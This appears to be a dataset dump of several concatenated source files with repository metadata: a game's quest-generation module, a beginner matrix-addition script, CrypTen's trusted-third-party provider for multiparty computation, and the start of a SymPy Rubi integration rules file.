        kb += questgen_facts.PreferenceEquipmentSlot(object=hero_uid, equipment_slot=hero_info.preferences_equipment_slot.value)
def get_knowledge_base(hero_info, without_restrictions=False): # pylint: disable=R0912
    """Build the questgen knowledge base describing the world for *hero_info*.

    With ``without_restrictions`` the "interfered persons" limitation is
    skipped, which enlarges the set of quests that can be generated.
    """
    kb = questgen_knowledge_base.KnowledgeBase()
    hero_uid = uids.hero(hero_info.id)
    kb += questgen_facts.Hero(uid=hero_uid, externals={'id': hero_info.id})
    setup_places(kb, hero_info)
    setup_persons(kb, hero_info)
    setup_preferences(kb, hero_info)
    setup_social_connections(kb)
    if not without_restrictions:
        for person in persons_storage.persons.all():
            # persons the hero recently interacted with may not initiate a quest
            if person.place.id == hero_info.position_place_id and person.id in hero_info.interfered_persons:
                kb += questgen_facts.NotFirstInitiator(person=uids.person(person.id))
    kb.validate_consistency(WORLD_RESTRICTIONS)
    kb += [questgen_facts.UpgradeEquipmentCost(money=prototypes.QuestPrototype.upgrade_equipment_cost(hero_info))]
    return kb
def create_random_quest_for_hero(hero_info, logger):
    """Generate a random quest starting at the hero's current place.

    Falls back to unrestricted generation when the restricted attempt fails.
    """
    constructor = place_quest_constructor_fabric(place=hero_info.position_place,
                                                 person_action=None)
    return create_random_quest_with_constructor(hero_info,
                                                constructor,
                                                logger,
                                                excluded_quests=hero_info.excluded_quests,
                                                no_restrictions_on_fail=True)
def create_random_quest_for_place(hero_info, place, person_action, logger):
    """Generate a card-initiated quest tied to *place* (helping or harming it)."""
    constructor = place_quest_constructor_fabric(place=place,
                                                 person_action=person_action)
    # card-initiated quests are limited to quest types allowed for cards
    excluded_quests = [record.quest_class.TYPE
                       for record in relations.QUESTS.records
                       if not record.allowed_for_cards]
    return create_random_quest_with_constructor(hero_info,
                                                constructor,
                                                logger,
                                                excluded_quests=excluded_quests,
                                                no_restrictions_on_fail=False)
def create_random_quest_for_person(hero_info, person, person_action, logger):
    """Generate a card-initiated quest tied to *person* (helping or harming them)."""
    constructor = person_quest_constructor_fabric(person=person,
                                                  person_action=person_action)
    # card-initiated quests are limited to quest types allowed for cards
    excluded_quests = [record.quest_class.TYPE
                       for record in relations.QUESTS.records
                       if not record.allowed_for_cards]
    return create_random_quest_with_constructor(hero_info,
                                                constructor,
                                                logger,
                                                excluded_quests=excluded_quests,
                                                no_restrictions_on_fail=False)
def create_random_quest_for_emissary(hero_info, emissary, person_action, logger):
    """Generate a card-initiated quest tied to *emissary* (helping or harming them)."""
    constructor = emissary_quest_constructor_fabric(emissary=emissary,
                                                    person_action=person_action)
    # card-initiated quests are limited to quest types allowed for cards
    excluded_quests = [record.quest_class.TYPE
                       for record in relations.QUESTS.records
                       if not record.allowed_for_cards]
    return create_random_quest_with_constructor(hero_info,
                                                constructor,
                                                logger,
                                                excluded_quests=excluded_quests,
                                                no_restrictions_on_fail=False)
def create_random_quest_with_constructor(hero_info, constructor, logger, excluded_quests, no_restrictions_on_fail):
    """Try to generate a quest for the hero with the given *constructor*.

    Quest types are attempted in priority-weighted random order; when every
    type fails and ``no_restrictions_on_fail`` is set, generation is retried
    without world restrictions.  Returns the knowledge base or None.
    """
    start_time = time.time()
    normal_mode = True
    # order quest types randomly, weighted by the hero's priorities
    quests = utils_logic.shuffle_values_by_priority(hero_info.quests_priorities)
    logger.info('hero[%(hero_id).6d]: try is_normal: %(is_normal)s (allowed: %(allowed)s) (excluded: %(excluded)s)' %
                {'hero_id': hero_info.id,
                 'is_normal': normal_mode,
                 'allowed': ', '.join(quest.quest_class.TYPE for quest in quests),
                 'excluded': ', '.join(excluded_quests)})
    quest_type, knowledge_base = try_to_create_random_quest_for_hero(hero_info,
                                                                     quests,
                                                                     excluded_quests,
                                                                     without_restrictions=False,
                                                                     constructor=constructor,
                                                                     logger=logger)
    if knowledge_base is None and no_restrictions_on_fail:
        logger.info('hero[%(hero_id).6d]: first try failed' % {'hero_id': hero_info.id})
        # second attempt: ignore restrictions and the excluded-quests list
        normal_mode = False
        quest_type, knowledge_base = try_to_create_random_quest_for_hero(hero_info,
                                                                         quests,
                                                                         excluded_quests=[],
                                                                         without_restrictions=True,
                                                                         constructor=constructor,
                                                                         logger=logger)
    spent_time = time.time() - start_time
    logger.info('hero[%(hero_id).6d]: %(spent_time)s is_normal: %(is_normal)s %(quest_type)20s (allowed: %(allowed)s) (excluded: %(excluded)s)' %
                {'hero_id': hero_info.id,
                 'spent_time': spent_time,
                 'is_normal': normal_mode,
                 'quest_type': quest_type,
                 'allowed': ', '.join(quest.quest_class.TYPE for quest in quests),
                 'excluded': ', '.join(excluded_quests)})
    return knowledge_base
def try_to_create_random_quest_for_hero(hero_info, quests, excluded_quests, without_restrictions, constructor, logger):
    """Attempt each allowed quest type in order; return ``(type, kb)`` or ``(None, None)``."""
    for quest_type in quests:
        if quest_type.quest_class.TYPE in excluded_quests:
            continue
        try:
            return quest_type, _create_random_quest_for_hero(hero_info,
                                                             constructor=constructor,
                                                             start_quests=[quest_type.quest_class.TYPE],
                                                             without_restrictions=without_restrictions)
        except questgen_exceptions.RollBackError as e:
            # generation of this quest type failed — log it and try the next one
            logger.info('hero[%(hero_id).6d]: can not create quest <%(quest_type)s>: %(exception)s' %
                        {'hero_id': hero_info.id,
                         'quest_type': quest_type,
                         'exception': e})
            continue
    return None, None
@utils_decorators.retry_on_exception(max_retries=conf.settings.MAX_QUEST_GENERATION_RETRIES,
                                     exceptions=[questgen_exceptions.RollBackError])
def _create_random_quest_for_hero(hero_info, constructor, start_quests, without_restrictions=False):
    """Build one quest graph for the hero; retried on RollBackError by the decorator."""
    knowledge_base = get_knowledge_base(hero_info, without_restrictions=without_restrictions)
    selector = questgen_selectors.Selector(knowledge_base, QUESTS_BASE, social_connection_probability=0)
    knowledge_base += constructor(selector, start_quests)
    # post-process the generated graph into its final, playable form
    questgen_transformators.activate_events(knowledge_base) # TODO: after remove restricted states
    questgen_transformators.remove_restricted_states(knowledge_base)
    questgen_transformators.remove_broken_states(knowledge_base) # MUST be called after all graph changes
    questgen_transformators.determine_default_choices(knowledge_base, preferred_markers=hero_info.prefered_quest_markers) # MUST be called after all graph changes and on valid graph
    questgen_transformators.remove_unused_actors(knowledge_base)
    knowledge_base.validate_consistency(WORLD_RESTRICTIONS)
    knowledge_base.validate_consistency(QUEST_RESTRICTIONS)
    return knowledge_base
def place_quest_constructor_fabric(place, person_action):
    """Build a quest constructor that starts a quest from *place*.

    When *person_action* is HELP/HARM, branch restrictions for the place and
    its persons are adjusted so the quest outcome matches the intent; with
    ``person_action=None`` no branch bias is applied.
    """
    def constructor(selector, start_quests):
        f_place = fact_place(place)
        if f_place.uid not in selector._kb:
            selector._kb += f_place
        if person_action is not None:
            if person_action.is_HELP:
                selector._kb += questgen_facts.OnlyGoodBranches(object=f_place.uid)
            elif person_action.is_HARM:
                selector._kb += questgen_facts.OnlyBadBranches(object=f_place.uid)
            # bias every person of the place the same way as the place itself
            for person in place.persons:
                f_person = setup_person(selector._kb, person)
                if person_action.is_HELP:
                    remove_help_restrictions(selector._kb, f_person.uid, f_place.uid)
                    selector._kb += questgen_facts.OnlyGoodBranches(object=f_person.uid)
                elif person_action.is_HARM:
                    remove_harm_restrictions(selector._kb, f_person.uid, f_place.uid)
                    selector._kb += questgen_facts.OnlyBadBranches(object=f_person.uid)
        # reserve the place so nested quests do not reuse it
        selector.reserve(f_place)
        return selector.create_quest_from_place(nesting=0,
                                                initiator_position=f_place,
                                                allowed=start_quests,
                                                excluded=[],
                                                tags=('can_start', ))
    return constructor
def emissary_quest_constructor_fabric(emissary, person_action):
    """Build a quest constructor that starts a quest from *emissary*.

    *person_action* must be HELP or HARM; branch restrictions on the emissary
    are relaxed/enforced accordingly.
    """
    def constructor(selector, start_quests):
        f_emissary = fact_emissary(emissary)
        f_emissary_place = fact_place(emissary.place)
        selector._kb += f_emissary
        selector._kb += questgen_facts.LocatedIn(object=f_emissary.uid, place=uids.place(emissary.place_id))
        if f_emissary_place.uid not in selector._kb:
            selector._kb += f_emissary_place
        if person_action.is_HELP:
            remove_help_restrictions(selector._kb, f_emissary.uid, f_emissary_place.uid)
            selector._kb += questgen_facts.OnlyGoodBranches(object=f_emissary.uid)
        elif person_action.is_HARM:
            remove_harm_restrictions(selector._kb, f_emissary.uid, f_emissary_place.uid)
            selector._kb += questgen_facts.OnlyBadBranches(object=f_emissary.uid)
        else:
            raise NotImplementedError
        # reserve the actors so nested quests do not reuse them
        selector.reserve(f_emissary)
        selector.reserve(f_emissary_place)
        return selector.create_quest_from_person(nesting=0,
                                                 initiator=f_emissary,
                                                 allowed=start_quests,
                                                 excluded=[],
                                                 tags=('can_start', ))
    return constructor
def remove_restrictions(kb, Fact, object_uid):
    """Drop every fact of type *Fact* attached to *object_uid* from *kb*."""
    doomed = [fact for fact in kb.filter(Fact) if fact.object == object_uid]
    kb -= doomed
def remove_help_restrictions(kb, person_uid, place_uid):
    """Lift the "no good endings" restrictions from the place and the person."""
    for uid in (place_uid, person_uid):
        remove_restrictions(kb, questgen_facts.OnlyBadBranches, uid)
        remove_restrictions(kb, questgen_facts.ExceptGoodBranches, uid)
def remove_harm_restrictions(kb, person_uid, place_uid):
    """Lift the "no bad endings" restrictions from the place and the person."""
    for uid in (place_uid, person_uid):
        remove_restrictions(kb, questgen_facts.OnlyGoodBranches, uid)
        remove_restrictions(kb, questgen_facts.ExceptBadBranches, uid)
def person_quest_constructor_fabric(person, person_action):
    """Build a quest constructor that starts a quest from *person*.

    *person_action* must be HELP or HARM; branch restrictions on the person
    are relaxed/enforced accordingly.
    """
    def constructor(selector, start_quests):
        place_uid = uids.place(person.place_id)
        f_person = setup_person(selector._kb, person)
        if person_action.is_HELP:
            remove_help_restrictions(selector._kb, f_person.uid, place_uid)
            selector._kb += questgen_facts.OnlyGoodBranches(object=f_person.uid)
        elif person_action.is_HARM:
            remove_harm_restrictions(selector._kb, f_person.uid, place_uid)
            selector._kb += questgen_facts.OnlyBadBranches(object=f_person.uid)
        else:
            raise NotImplementedError
        # reserve the actors so nested quests do not reuse them
        selector.reserve(f_person)
        selector.reserve(selector._kb[place_uid])
        return selector.create_quest_from_person(nesting=0,
                                                 initiator=f_person,
                                                 allowed=start_quests,
                                                 excluded=[],
                                                 tags=('can_start', ))
    return constructor
def create_hero_info(hero):
    """Snapshot everything quest generation needs from *hero* into a HeroQuestInfo."""
    quests_priorities = hero.get_quests_priorities()
    return HeroQuestInfo(id=hero.id,
                         level=hero.level,
                         position_place_id=hero.position.cell().nearest_place_id,
                         is_first_quest_path_required=hero.is_first_quest_path_required,
                         preferences_mob_id=hero.preferences.mob.id if hero.preferences.mob else None,
                         preferences_place_id=hero.preferences.place.id if hero.preferences.place else None,
                         preferences_friend_id=hero.preferences.friend.id if hero.preferences.friend else None,
                         preferences_enemy_id=hero.preferences.enemy.id if hero.preferences.enemy else None,
                         preferences_equipment_slot=hero.preferences.equipment_slot,
                         preferences_quests_region_id=hero.preferences.quests_region.id if hero.preferences.quests_region else None,
                         preferences_quests_region_size=hero.preferences.quests_region_size,
                         interfered_persons=hero.quests.get_interfered_persons(),
                         quests_priorities=quests_priorities,
                         excluded_quests=hero.quests.excluded_quests(len(quests_priorities) // 2),
                         prefered_quest_markers=hero.prefered_quest_markers())
def request_quest_for_hero(hero, emissary_id=None, place_id=None, person_id=None, person_action=None):
    """Send an asynchronous quest-generation request to the generator worker."""
    hero_info = create_hero_info(hero)
    amqp_environment.environment.workers.quests_generator.cmd_request_quest(hero.account_id,
                                                                            hero_info.serialize(),
                                                                            emissary_id=emissary_id,
                                                                            place_id=place_id,
                                                                            person_id=person_id,
                                                                            person_action=person_action)
def setup_quest_for_hero(hero, knowledge_base_data):
    """Attach a generated quest (serialized knowledge base) to *hero* and start it."""
    # do nothing if hero has already had quest
    if not hero.actions.current_action.searching_quest:
        return
    knowledge_base = questgen_knowledge_base.KnowledgeBase.deserialize(knowledge_base_data, fact_classes=questgen_facts.FACTS)
    states_to_percents = questgen_analysers.percents_collector(knowledge_base)
    quest = prototypes.QuestPrototype(hero=hero, knowledge_base=knowledge_base, states_to_percents=states_to_percents)
    # set up the quest before it starts, so that it is correctly
    # recorded on the action stack
    hero.actions.current_action.setup_quest(quest)
    if quest.machine.can_do_step():
        quest.machine.step() # do first step to setup pointer
    # force the hero to satisfy the requirements of the quest's start node;
    # needed when the quest is initiated by the player and the hero is not
    # at the quest's starting location
    quest.machine.check_requirements(quest.machine.current_state)
    quest.machine.satisfy_requirements(quest.machine.current_state)
def extract_person_type(fact):
    """Return the actor type stored in a fact's externals (PERSON by default)."""
    raw_type = fact.externals.get('type', game_relations.ACTOR.PERSON.value)
    return game_relations.ACTOR(raw_type)
| [
"[email protected]"
]
| |
ceb03e78d5da369eaa15cfadb539d06f2ad3979b | c3e2f56672e01590dc7dc7e184f30c2884ce5d3a | /Programs/MyPythonXII/Unit1/PyChap03/summatrix.py | a00722d07d1ce3b80baa6858b737eb411c6ad68e | []
| no_license | mridulrb/Basic-Python-Examples-for-Beginners | ef47e830f3cc21cee203de2a7720c7b34690e3e1 | 86b0c488de4b23b34f7424f25097afe1874222bd | refs/heads/main | 2023-01-04T09:38:35.444130 | 2020-10-18T15:59:29 | 2020-10-18T15:59:29 | 305,129,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,941 | py | # File name: ...\\MyPythonXII\Unit1\PyChap03\summatrix.py
# Program to add two matrices
# Declaration of three 10 x 10 matrices
A = [[0 for x in range(10)] for x in range(10)]
B = [[0 for x in range(10)] for x in range(10)]
C = [[0 for x in range(10)] for x in range(10)]
print("Enter the number of Rows of matrix A: ", end='')
r = int(input())
print("Enter the number of Columns of matrix A: ", end='')
c = int(input())
print("Enter the number of Rows of matrix B: ", end='')
r1 = int(input())
print("Enter the number of Columns of matrix B: ", end='')
c1 = int(input())
# Before accepting the Elements Check if no of
# rows and columns of both matrices is equal
if (r == r1 and c == c1):
# Accept the Elements for matrix A
for i in range(r):
for j in range(c):
print("Enter the element A[%d][%d]: " % (i, j), end='')
A[i][j] = int(input())
# Accept the Elements for matrix B
for i in range(r):
for j in range(c):
print("Enter the element B[%d][%d]: " % (i, j), end='')
B[i][j] = int(input())
# Addition of two matrices
for i in range(r):
for j in range(c):
C[i][j] = A[i][j] + B[i][j]
# First matrix
print("Matrix A:")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print("{0:^3}".format(A[i][j]), end=' ')
print()
print("Matrix B:")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print("{0:^3}".format(B[i][j]), end=' ')
print()
# Print out the Resultant Matrix C
print("The Addition of two Matrices C is : ")
for i in range(r):
print(" "*5, end="")
for j in range(c):
print ("{0:^3}".format(C[i][j]), end=' ')
print()
else:
print("Order of two matrices is not same ")
| [
"[email protected]"
]
| |
97b8958344299980760e8949312f7387d6e8b9ae | 49eba6a6d52b46171d88adc87cd2f761c0eb90d4 | /crypten/mpc/provider/ttp_provider.py | e3a09ac97d52be242b3c1ecc03184acbe8da7d7b | [
"MIT"
]
| permissive | tnpe/CrypTen | 8bfc07556df2b497214a4b32c11eb180f62e45dd | 6a06dc8cd52200f40a9fc520be0066bd0dea6b14 | refs/heads/master | 2023-02-26T10:15:39.729336 | 2021-01-20T14:54:29 | 2021-01-20T14:56:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,063 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from functools import reduce
import crypten
import crypten.communicator as comm
import torch
import torch.distributed as dist
from crypten.common.rng import generate_kbit_random_tensor, generate_random_ring_element
from crypten.common.util import count_wraps, torch_stack
from crypten.mpc.primitives import ArithmeticSharedTensor, BinarySharedTensor
# Names of the correlated-randomness requests the TTP server can answer.
TTP_FUNCTIONS = ["additive", "square", "binary", "wraps", "B2A"]
class TrustedThirdParty:
    """Tuple provider backed by a trusted third party (TTP) process.

    Party 0 requests each correlated value from the TTPServer over the TTP
    process group, while every other party derives its share locally from a
    pseudo-random generator whose seed it shares with the server — so only
    party 0's share of each value travels over the wire.
    """
    NAME = "TTP"
    @staticmethod
    def generate_additive_triple(size0, size1, op, device=None, *args, **kwargs):
        """Generate multiplicative triples of given sizes"""
        generator = TTPClient.get().get_generator(device=device)
        # every party draws its shares of a and b from the seed-shared PRNG
        a = generate_random_ring_element(size0, generator=generator, device=device)
        b = generate_random_ring_element(size1, generator=generator, device=device)
        if comm.get().get_rank() == 0:
            # Request c from TTP
            c = TTPClient.get().ttp_request(
                "additive", device, size0, size1, op, *args, **kwargs
            )
        else:
            # TODO: Compute size without executing computation
            c_size = getattr(torch, op)(a, b, *args, **kwargs).size()
            c = generate_random_ring_element(c_size, generator=generator, device=device)
        a = ArithmeticSharedTensor.from_shares(a, precision=0)
        b = ArithmeticSharedTensor.from_shares(b, precision=0)
        c = ArithmeticSharedTensor.from_shares(c, precision=0)
        return a, b, c
    @staticmethod
    def square(size, device=None):
        """Generate square double of given size"""
        generator = TTPClient.get().get_generator(device=device)
        r = generate_random_ring_element(size, generator=generator, device=device)
        if comm.get().get_rank() == 0:
            # Request r2 from TTP
            r2 = TTPClient.get().ttp_request("square", device, size)
        else:
            r2 = generate_random_ring_element(size, generator=generator, device=device)
        r = ArithmeticSharedTensor.from_shares(r, precision=0)
        r2 = ArithmeticSharedTensor.from_shares(r2, precision=0)
        return r, r2
    @staticmethod
    def generate_binary_triple(size0, size1, device=None):
        """Generate binary triples of given size"""
        generator = TTPClient.get().get_generator(device=device)
        a = generate_kbit_random_tensor(size0, generator=generator, device=device)
        b = generate_kbit_random_tensor(size1, generator=generator, device=device)
        if comm.get().get_rank() == 0:
            # Request c from TTP
            c = TTPClient.get().ttp_request("binary", device, size0, size1)
        else:
            # c's shape follows broadcasting of a against b
            size2 = torch.broadcast_tensors(a, b)[0].size()
            c = generate_kbit_random_tensor(size2, generator=generator, device=device)
        # Stack to vectorize scatter function
        a = BinarySharedTensor.from_shares(a)
        b = BinarySharedTensor.from_shares(b)
        c = BinarySharedTensor.from_shares(c)
        return a, b, c
    @staticmethod
    def wrap_rng(size, device=None):
        """Generate random shared tensor of given size and sharing of its wraps"""
        generator = TTPClient.get().get_generator(device=device)
        r = generate_random_ring_element(size, generator=generator, device=device)
        if comm.get().get_rank() == 0:
            # Request theta_r from TTP
            theta_r = TTPClient.get().ttp_request("wraps", device, size)
        else:
            theta_r = generate_random_ring_element(
                size, generator=generator, device=device
            )
        r = ArithmeticSharedTensor.from_shares(r, precision=0)
        theta_r = ArithmeticSharedTensor.from_shares(theta_r, precision=0)
        return r, theta_r
    @staticmethod
    def B2A_rng(size, device=None):
        """Generate random bit tensor as arithmetic and binary shared tensors"""
        generator = TTPClient.get().get_generator(device=device)
        # generate random bit
        rB = generate_kbit_random_tensor(
            size, bitlength=1, generator=generator, device=device
        )
        if comm.get().get_rank() == 0:
            # Request rA from TTP
            rA = TTPClient.get().ttp_request("B2A", device, size)
        else:
            rA = generate_random_ring_element(size, generator=generator, device=device)
        rA = ArithmeticSharedTensor.from_shares(rA, precision=0)
        rB = BinarySharedTensor.from_shares(rB)
        return rA, rB
    @staticmethod
    def rand(*sizes, encoder=None, device=None):
        """Generate random ArithmeticSharedTensor uniform on [0, 1]"""
        generator = TTPClient.get().get_generator(device=device)
        if isinstance(sizes, torch.Size):
            sizes = tuple(sizes)
        if isinstance(sizes[0], torch.Size):
            sizes = tuple(sizes[0])
        if comm.get().get_rank() == 0:
            # Request samples from TTP
            # NOTE(review): the TTPServer defined in this file has no `rand`
            # handler, so this request would fail with AttributeError on the
            # server — verify against the server implementation in use.
            samples = TTPClient.get().ttp_request(
                "rand", device, *sizes, encoder=encoder
            )
        else:
            samples = generate_random_ring_element(
                sizes, generator=generator, device=device
            )
        return ArithmeticSharedTensor.from_shares(samples)
    @staticmethod
    def _init():
        # Initialize the per-party TTP client singleton.
        TTPClient._init()
    @staticmethod
    def uninit():
        # Tear down the per-party TTP client singleton.
        TTPClient.uninit()
class TTPClient:
    """Per-party singleton that exchanges messages with the TTPServer."""
    __instance = None
    class __TTPClient:
        """Singleton class"""
        def __init__(self):
            # Initialize connection
            self.ttp_group = comm.get().ttp_group
            self.comm_group = comm.get().ttp_comm_group
            self._setup_generators()
            logging.info(f"TTPClient {comm.get().get_rank()} initialized")
        def _setup_generators(self):
            """Receive this party's PRNG seed from the TTP and seed local generators."""
            seed = torch.empty(size=(), dtype=torch.long)
            dist.irecv(
                tensor=seed, src=comm.get().get_ttp_rank(), group=self.ttp_group
            ).wait()
            dist.barrier(group=self.ttp_group)
            # one generator per device type, both seeded identically
            self.generator = torch.Generator(device="cpu")
            self.generator_cuda = torch.Generator(device="cuda")
            self.generator.manual_seed(seed.item())
            self.generator_cuda.manual_seed(seed.item())
        def get_generator(self, device=None):
            """Return the CPU or CUDA generator matching *device* (defaults to cpu)."""
            if device is None:
                device = "cpu"
            device = torch.device(device)
            if device.type == "cuda":
                return self.generator_cuda
            else:
                return self.generator
        def ttp_request(self, func_name, device, *args, **kwargs):
            """Send a request to the TTPServer and return the broadcast result tensor."""
            assert (
                comm.get().get_rank() == 0
            ), "Only party 0 communicates with the TTPServer"
            if device is not None:
                device = str(device)
            # request protocol: function name + device + positional/keyword args
            message = {
                "function": func_name,
                "device": device,
                "args": args,
                "kwargs": kwargs,
            }
            ttp_rank = comm.get().get_ttp_rank()
            comm.get().send_obj(message, ttp_rank, self.ttp_group)
            # the server replies with the result size first, then broadcasts it
            size = comm.get().recv_obj(ttp_rank, self.ttp_group)
            result = torch.empty(size, dtype=torch.long, device=device)
            comm.get().broadcast(result, ttp_rank, self.comm_group)
            return result
    @staticmethod
    def _init():
        """Initializes a Trusted Third Party client that sends requests"""
        if TTPClient.__instance is None:
            TTPClient.__instance = TTPClient.__TTPClient()
    @staticmethod
    def uninit():
        """Uninitializes a Trusted Third Party client"""
        del TTPClient.__instance
        TTPClient.__instance = None
    @staticmethod
    def get():
        """Returns the instance of the TTPClient"""
        if TTPClient.__instance is None:
            raise RuntimeError("TTPClient is not initialized")
        return TTPClient.__instance
class TTPServer:
    """Trusted-third-party process: answers correlated-randomness requests.

    On startup it sends every party the seed of that party's pseudo-random
    generator; afterwards it can reconstruct each party's local shares and
    only has to broadcast party 0's "correcting" share of each value.
    """
    TERMINATE = -1
    def __init__(self):
        """Initializes a Trusted Third Party server that receives requests"""
        # Initialize connection
        crypten.init()
        self.ttp_group = comm.get().ttp_group
        self.comm_group = comm.get().ttp_comm_group
        self.device = "cpu"
        self._setup_generators()
        ttp_rank = comm.get().get_ttp_rank()
        logging.info("TTPServer Initialized")
        try:
            while True:
                # Wait for next request from client
                message = comm.get().recv_obj(0, self.ttp_group)
                logging.info("Message received: %s" % message)
                if message == "terminate":
                    logging.info("TTPServer shutting down.")
                    return
                function = message["function"]
                device = message["device"]
                args = message["args"]
                kwargs = message["kwargs"]
                self.device = device
                # dispatch to the handler named in the request
                # (additive, square, binary, wraps, B2A)
                result = getattr(self, function)(*args, **kwargs)
                # reply with the result size, then broadcast the result itself
                comm.get().send_obj(result.size(), 0, self.ttp_group)
                comm.get().broadcast(result, ttp_rank, self.comm_group)
        except RuntimeError as err:
            logging.info("Encountered Runtime error. TTPServer shutting down:")
            logging.info(f"{err}")
    def _setup_generators(self):
        """Create random generator to send to a party"""
        ws = comm.get().get_world_size()
        # one independent 64-bit seed per party
        seeds = [torch.randint(-(2 ** 63), 2 ** 63 - 1, size=()) for _ in range(ws)]
        reqs = [
            dist.isend(tensor=seeds[i], dst=i, group=self.ttp_group) for i in range(ws)
        ]
        self.generators = [torch.Generator(device="cpu") for _ in range(ws)]
        self.generators_cuda = [torch.Generator(device="cuda") for _ in range(ws)]
        for i in range(ws):
            self.generators[i].manual_seed(seeds[i].item())
            self.generators_cuda[i].manual_seed(seeds[i].item())
            reqs[i].wait()
        dist.barrier(group=self.ttp_group)
    def _get_generators(self, device=None):
        """Return the per-party generator list matching *device* (defaults to cpu)."""
        if device is None:
            device = "cpu"
        device = torch.device(device)
        if device.type == "cuda":
            return self.generators_cuda
        else:
            return self.generators
    def _get_additive_PRSS(self, size, remove_rank=False):
        """
        Generates a plaintext value from a set of random additive secret shares
        generated by each party
        """
        gens = self._get_generators(device=self.device)
        if remove_rank:
            # skip party 0's generator: its share is the value the server sends
            gens = gens[1:]
        result = torch_stack(
            [
                generate_random_ring_element(size, generator=g, device=g.device)
                for g in gens
            ]
        )
        return result.sum(0)
    def _get_binary_PRSS(self, size, bitlength=None, remove_rank=None):
        """
        Generates a plaintext value from a set of random binary secret shares
        generated by each party
        """
        gens = self._get_generators(device=self.device)
        if remove_rank:
            # skip party 0's generator: its share is the value the server sends
            gens = gens[1:]
        result = [
            generate_kbit_random_tensor(
                size, bitlength=bitlength, generator=g, device=g.device
            )
            for g in gens
        ]
        return reduce(lambda a, b: a ^ b, result)
    def additive(self, size0, size1, op, *args, **kwargs):
        """Return party 0's share of c = op(a, b) for a Beaver-style triple."""
        # Add all shares of `a` and `b` to get plaintext `a` and `b`
        a = self._get_additive_PRSS(size0)
        b = self._get_additive_PRSS(size1)
        c = getattr(torch, op)(a, b, *args, **kwargs)
        # Subtract all other shares of `c` from plaintext value of `c` to get `c0`
        c0 = c - self._get_additive_PRSS(c.size(), remove_rank=True)
        return c0
    def square(self, size):
        """Return party 0's share of r**2 for a random-square pair."""
        # Add all shares of `r` to get plaintext `r`
        r = self._get_additive_PRSS(size)
        r2 = r.mul(r)
        return r2 - self._get_additive_PRSS(size, remove_rank=True)
    def binary(self, size0, size1):
        """Return party 0's share of c = a & b for a binary triple."""
        # xor all shares of `a` and `b` to get plaintext `a` and `b`
        a = self._get_binary_PRSS(size0)
        b = self._get_binary_PRSS(size1)
        c = a & b
        # xor all other shares of `c` from plaintext value of `c` to get `c0`
        c0 = c ^ self._get_binary_PRSS(c.size(), remove_rank=True)
        return c0
    def wraps(self, size):
        """Return party 0's share of the wrap count of the parties' shares of r."""
        r = [generate_random_ring_element(size, generator=g) for g in self.generators]
        theta_r = count_wraps(r)
        return theta_r - self._get_additive_PRSS(size, remove_rank=True)
    def B2A(self, size):
        """Return party 0's arithmetic share of the random bit shared in binary."""
        rB = self._get_binary_PRSS(size, bitlength=1)
        # Subtract all other shares of `rA` from plaintext value of `rA`
        rA = rB - self._get_additive_PRSS(size, remove_rank=True)
        return rA
| [
"[email protected]"
]
| |
6761e8fe9dbbdf0919c1045ac3ee86a999c1cea5 | bc6492a9a30ac7228caad91643d58653b49ab9e3 | /sympy/integrals/rubi/rules/exponential.py | 90b28d15cf3a1c0f5509ed7a20ff2220e061a60f | []
| no_license | cosmosZhou/sagemath | 2c54ea04868882340c7ef981b7f499fb205095c9 | 0608b946174e86182c6d35d126cd89d819d1d0b8 | refs/heads/master | 2023-01-06T07:31:37.546716 | 2020-11-12T06:39:22 | 2020-11-12T06:39:22 | 311,177,322 | 1 | 0 | null | 2020-11-12T06:09:11 | 2020-11-08T23:42:40 | Python | UTF-8 | Python | false | false | 67,083 | py | '''
This code is automatically generated. Never edit it manually.
For details of generating the code see `rubi_parsing_guide.md` in `parsetools`.
'''
from sympy.external import import_module
matchpy = import_module("matchpy")
from sympy.utilities.decorator import doctest_depends_on
if matchpy:
from matchpy import Pattern, ReplacementRule, CustomConstraint, is_match
from sympy.integrals.rubi.utility_function import (
Int, Sum, Set, With, Module, Scan, MapAnd, FalseQ,
ZeroQ, NegativeQ, NonzeroQ, FreeQ, NFreeQ, List, Log, PositiveQ,
PositiveIntegerQ, NegativeIntegerQ, IntegerQ, IntegersQ,
ComplexNumberQ, PureComplexNumberQ, RealNumericQ, PositiveOrZeroQ,
NegativeOrZeroQ, FractionOrNegativeQ, NegQ, Equal, Unequal, IntPart,
FracPart, RationalQ, ProductQ, SumQ, NonsumQ, Subst, First, Rest,
SqrtNumberQ, SqrtNumberSumQ, LinearQ, Sqrt, ArcCosh, Coefficient,
Denominator, Hypergeometric2F1, Not, Simplify, FractionalPart,
IntegerPart, AppellF1, EllipticPi, EllipticE, EllipticF, ArcTan,
ArcCot, ArcCoth, ArcTanh, ArcSin, ArcSinh, ArcCos, ArcCsc, ArcSec,
ArcCsch, ArcSech, Sinh, Tanh, Cosh, Sech, Csch, Coth, LessEqual, Less,
Greater, GreaterEqual, FractionQ, IntLinearcQ, Expand, IndependentQ,
PowerQ, IntegerPowerQ, PositiveIntegerPowerQ, FractionalPowerQ, AtomQ,
ExpQ, LogQ, Head, MemberQ, TrigQ, SinQ, CosQ, TanQ, CotQ, SecQ, CscQ,
Sin, Cos, Tan, Cot, Sec, Csc, HyperbolicQ, SinhQ, CoshQ, TanhQ, CothQ,
SechQ, CschQ, InverseTrigQ, SinCosQ, SinhCoshQ, LeafCount, Numerator,
NumberQ, NumericQ, Length, ListQ, Im, Re, InverseHyperbolicQ,
InverseFunctionQ, TrigHyperbolicFreeQ, InverseFunctionFreeQ, RealQ,
EqQ, FractionalPowerFreeQ, ComplexFreeQ, PolynomialQ, FactorSquareFree,
PowerOfLinearQ, Exponent, QuadraticQ, LinearPairQ, BinomialParts,
TrinomialParts, PolyQ, EvenQ, OddQ, PerfectSquareQ, NiceSqrtAuxQ,
NiceSqrtQ, Together, PosAux, PosQ, CoefficientList, ReplaceAll,
ExpandLinearProduct, GCD, ContentFactor, NumericFactor,
NonnumericFactors, MakeAssocList, GensymSubst, KernelSubst,
ExpandExpression, Apart, SmartApart, MatchQ,
PolynomialQuotientRemainder, FreeFactors, NonfreeFactors,
RemoveContentAux, RemoveContent, FreeTerms, NonfreeTerms,
ExpandAlgebraicFunction, CollectReciprocals, ExpandCleanup,
